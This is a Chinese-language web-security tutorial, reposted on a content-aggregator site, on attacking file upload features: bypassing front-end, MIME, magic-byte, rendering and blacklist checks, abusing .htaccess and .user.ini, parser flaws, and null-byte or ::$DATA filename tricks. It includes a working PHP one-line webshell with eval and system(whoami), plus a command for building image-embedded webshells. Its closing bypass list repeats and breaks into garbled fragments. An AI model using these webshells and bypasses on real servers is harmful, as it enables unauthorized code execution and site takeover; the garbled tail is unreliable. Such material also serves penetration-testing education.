网站专题页面案例2015年做那个网站致富
web/
2025/10/1 5:56:40/
文章来源:
网站专题页面案例,2015年做那个网站致富,推广网站广告,wordpress 图片选择文件上传基础篇
文件上传漏洞原理
目标网站存在文件上传接口#xff0c;但是对用户上传的文件没有做仔细甄别#xff0c;导致黑客可以根据此功能点直接上传木马到网站服务器#xff0c;造成危害
文件上传存在点
通常有头像上传#xff0c;pdf上传
文件上传防护 …文件上传基础篇
文件上传漏洞原理
目标网站存在文件上传接口但是对用户上传的文件没有做仔细甄别导致黑客可以根据此功能点直接上传木马到网站服务器造成危害
文件上传存在点
通常有头像上传pdf上传
文件上传防护
前后端同时验证文件后缀黑白名单校验文件头校验文件内容校验mime,二次渲染
文件上传绕过防护
前端校验直接警用js或者修改js代码也可以使用burp抓包修改文件名
文件头校验常见于图片上传点服务器会检测文件类型的文件头
常见文件头
JPEG (jpg) 文件头FFD8FF 文件尾FF D9
PNG (png) 文件头89504E47 文件尾AE 42 60 82
GIF (gif) 文件头47494638 文件尾00 3B ZIP Archive (zip) 文件头504B0304 文件尾50 4BTIFF (tif) 文件头49492A00 文件尾
Windows Bitmap (bmp) 文件头424D 文件尾
CAD (dwg) 文件头41433130 文件尾
Adobe Photoshop (psd) 文件头38425053 文件尾
Rich Text Format (rtf) 文件头7B5C727466 文件尾
XML (xml) 文件头3C3F786D6C 文件尾
HTML (html) 文件头68746D6C3E
Email [thorough only] (eml) 文件头44656C69766572792D646174653A
Outlook Express (dbx) 文件头CFAD12FEC5FD746F
Outlook (pst) 文件头2142444E
MS Word/Excel (xls.or.doc) 文件头D0CF11E0
MS Access (mdb) 文件头5374616E64617264204A
WordPerfect (wpd) 文件头FF575043
Adobe Acrobat (pdf) 文件头255044462D312E
Quicken (qdf) 文件头AC9EBD8F
Windows Password (pwl) 文件头E3828596RAR Archive (rar) 文件头52617221
Wave (wav) 文件头57415645
AVI (avi) 文件头41564920
Real Audio (ram) 文件头2E7261FD
Real Media (rm) 文件头2E524D46
MPEG (mpg) 文件头000001BA
MPEG (mpg) 文件头000001B3
Quicktime (mov) 文件头6D6F6F76
Windows Media (asf) 文件头3026B2758E66CF11
MIDI (mid) 文件头4D546864MIME校验即http数据包中的Content-Type字段直接用burp抓包修改此字段
二次渲染上传的文件被服务器端修改了常见于头像上传
(1)上传gif图片先将普通的gif图片上传会被渲染渲染之后再下载下来与原git图片对比找到渲染前后没有变化的位置然后在这些位置插入一句话木马再上传即可。
(2)上传jpg图片这两种格式图片的二次渲染绕过要难很多很多(索引类型图写入 PLTE 数据块或写入IDAT数据块)jpg(成功性不大)
条件竞争当文件上传后会短暂存在然后被删除时利用短时间大量高并发不停写入文件文件作用为生成木马文件当服务器未来得及删除文件时成功创建木马文件
黑名单:限制一些文件后缀例如exe,php,jsp,asp等
上传特殊可解析后缀
asp|asa|cer|cdx
aspx|ascx|ashx|asax|asac
php|php2|php3|php4|php5|asis|htaccess|.user.ini|phtm|phtml、pht(是否解析需要根据配置文件中设置类型来决定)
jsp|jspx|jspf
htm|html|shtml|pwml|js
vbs|asis|sh|reg|cgi|exe|dll|com|bat|pl|cfc|cfm|ini上传.htaccess
.htaccess文件是Apache服务器中的一个配置文件它负责相关目录下的网页配置。通过 .htaccess文件可以实现网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能IIS平台上不存在该文件该文件默认开启启用和关闭在 httpd.conf 文件中配置。.htaccess 文件生效前提条件为
mod_rewrite 模块开启
AllowOverride All上传.user.ini文件
原理
1、.user.ini 有点像.htaccessphp运行时会检索加载所有目录下的.ini配置文件从被执行的 PHP 文件所在目录开始一直上升到 web 根目录$_SERVER[DOCUMENT_ROOT] 所指定的。
2、.user.ini是一个能被动态加载的ini文件这点和php.ini不同。也就是说修改了.user.ini后不需要重启服务器中间件只需要等待user_ini.cache_ttl所设置的时间默认为300秒即可被重新加载。
利用
上传.user.ini
auto_prepend_file1.gif # 要访问的文件加载之前加载
或者
auto_append_file1.gif # 要访问的文件加载之后加载上传一个包含webshell代码的1.gif
GIF98A ?php eval($_REQUEST[a]);?访问本目录下任意文件附带参数?axxx 就可以实现命令执行
?aphpinfo(); ?asystem(whoami);白名单只允许规定文件后缀上传常见头像上传限制只能为gif,png,jpg后缀上传
图片马结合文件包含漏洞,将恶意代码放在图片马中
生成图片马
制作方法 copy 1.jpg/b 1.php/a 2.jpg b表示二进制文件 a表示ASCII文件也可以使用edjpgcom.exe工具然后结合文件包含漏洞利用配合解析漏洞
IIS
目录解析漏洞(/test.asp/1.jps)
文件名解析漏洞(test.asp;.jpg)
畸形解析漏洞test.jpg/*.phpNginx
畸形解析漏洞(test.jpg/*.php)
%00空字节代码解析漏洞
CVE-2013-4547(%20%00)Apache:
文件名解析漏洞test.php.owf.xdx利用NTFS ADS特性 其他
点绕过、空格绕过、后缀双写绕过、后缀大小写绕过、%00绕过、0x00绕过GET
shell.php%00.jpg
POST
hex里面改
shell.php%20%00.jpg
shell.php.
shell.php. .
00截断、MIME、点、空格、点空格点、::$DATA
shell.php::$DATA
shell.php
shell.php.
shell.php. .
GET
shell.php%00.jpg
POST
hex里面改
shell.php%20%00.jpg. shell.php. . 00截断、MIME、点、空格、点空格点、:: D A T A s h e l l . p h p : : DATA shell.php:: DATAshell.php::DATA shell.php shell.php. shell.php. . GET shell.php%00.jpg POST hex里面改 shell.php%20%00.jpg
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/84881.shtml
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!